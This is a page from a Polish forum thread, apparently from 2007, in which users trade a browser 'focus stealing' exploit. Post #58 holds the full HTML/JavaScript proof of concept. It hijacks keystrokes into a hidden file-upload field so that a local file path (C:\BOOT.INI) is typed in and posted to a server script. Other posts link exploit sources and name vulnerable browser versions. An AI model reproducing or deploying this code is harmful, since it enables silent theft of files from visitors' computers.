Strona 6 z 7 PierwszyPierwszy ... 4567 OstatniOstatni
Pokaż wyniki 51 do 60 z 70

Temat: raz kolejny problem z gg

  1. #51

    Domyślnie

    Cytat Napisał markossx Zobacz post
    szkoda bo nie zdążyłem się z nimi zapoznać, może jeszcze je gdzieś udostepnić na troche
    Poszukaj na google tematu focus stealing vulnarability. Na pewno znajdziesz podobne skrypty.
    Pliki juz nie powroca na serwer, za duzo ludzi na to wchodzilo.

  2. #52
    Zarejestrowany
    Nov 2006
    Skąd
    Polska/Poland
    Postów
    1,191

    Domyślnie

    jasne, dzięki
    ***********
    * markossx *
    ***********

  3. #53

    Domyślnie

    to nie jest dziura w IE. Ciekawe czy można obejść focusa. Nie da rady tego zrobić we flashu.

  4. #54

    Domyślnie

    Cytat Napisał markossx Zobacz post
    szkoda bo nie zdążyłem się z nimi zapoznać, może jeszcze je gdzieś udostepnić na troche
    Tutaj masz inne przykłady dla IE i Firefox-a:
    http://lcamtuf.coredump.cx/focusbug

    pozdrawiam
    phaxe

  5. #55
    Zarejestrowany
    Oct 2007
    Skąd
    Warszawa
    Postów
    3

    Domyślnie

    błagam o udostępnienie gdzieś tego skryptu

  6. #56
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    dwie minuty na googlach...

    fixed in mozilla 2.0.0.4
    http://gogulas.yoyo.pl/h.gif

  7. #57
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    ty sorry ale masz go "udostępnionego" jeden post wyżej od twojego!!
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

  8. #58
    Zarejestrowany
    Oct 2007
    Skąd
    Warszawa
    Postów
    3

    Domyślnie

    Cytat Napisał eMCe Zobacz post
    ty sorry ale masz go "udostępnionego" jeden post wyżej od twojego!!
    nie kminię tego zupełnie może ktoś mi dać link do skryptu w czystej postaci albo napiszć go tutaj ewentualnie na gg 210302

    <HTML>
    <HEAD>
    <style type="text/css">
    .first {
    }
    .second {
    color: white;
    background-color: white;
    opacity: 0;
    }
    </style>
    <SCRIPT>
    //document.onKeyDown = doKeyPress;

    //document.onKeyUp = doKeyUp;
    var saved;
    var e ;
    var mystring = "C:\\BOOT.INI";
    //var i=mystring.length-1;
    var i=0;
    function doKeyPress(chucky)
    {
    saved = chucky.which;
    //alert('pressed ' + String.fromCharCode(saved) + '(' + saved + ')');
    if (mystring[i] != String.fromCharCode(saved).toUpperCase() ||
    i > mystring.length-1) {
    return false;
    }
    i++;
    return true;
    };
    function doKeyUp () {

    document.forms[0].txt.value += String.fromCharCode(saved);
    document.forms[0].txt.focus();

    }

    </SCRIPT>
    </HEAD>
    <BODY >
    <FORM METHOD=POST action=file.php>
    <INPUT id='asdf' name="fileupload" defaultValue='asdfasdf' TYPE=FILE
    OnKeyUp="doKeyUp();"
    OnKeyPress="return doKeyPress(event);">
    <input name=txt id='txt' type=text value=''
    OnKeyDown="document.forms[0].fileupload.focus();"
    onClick="">
    <input type=button value="invisible"
    onclick="document.forms[0].fileupload.className='second';">
    <input type=button value="visible"
    onclick="document.forms[0].fileupload.className='first';">

    </FORM>
    </BODY>
    </HTML>


    chyba chodzi o to. jak nie to proszę poprawcie mnie. Dziękuję za dobre chęci i udzieloną mi pomoc oraz przepraszam za swoją niekompetencję
    Ostatnio edytowane przez TQM : 10-29-2007 - 20:44 Powód: UZYWAJ OPCJI 'EDIT' - po to ona jest!!!

  9. #59
    Zarejestrowany
    Sep 2007
    Skąd
    Tu
    Postów
    1,236

    Domyślnie

    Nie chodzi o niekompetencje, ale o lenistwo.
    Dwie minuty na googlach:
    http://www.securityfocus.com/bid/18308/exploit

    A jak wyglada plik file.php, tego nawet najstarsi gorale nie wiedza.... trzeba bedzie ruszyc lepetyna i znowu google pomeliorowac...

    Ale po co to komu, skoro firefox 2.0.0.4 juz sie na to nie nabiera, nie wiem jak jest z IE
    http://gogulas.yoyo.pl/h.gif

  10. #60
    Zarejestrowany
    Dec 2006
    Skąd
    Kielce
    Postów
    1,767

    Domyślnie

    IE - wersja 6.0.2900.2180_xpsp_sp2_rtm.040803-2158 (domyślnie serwowana wersja z sp2) jest podatna...
    Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )

Strona 6 z 7 PierwszyPierwszy ... 4567 OstatniOstatni

Podobne wątki

  1. Kolejny zielony
    By Sasuke in forum Hacking
    Odpowiedzi: 4
    Autor: 12-27-2006, 14:59

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj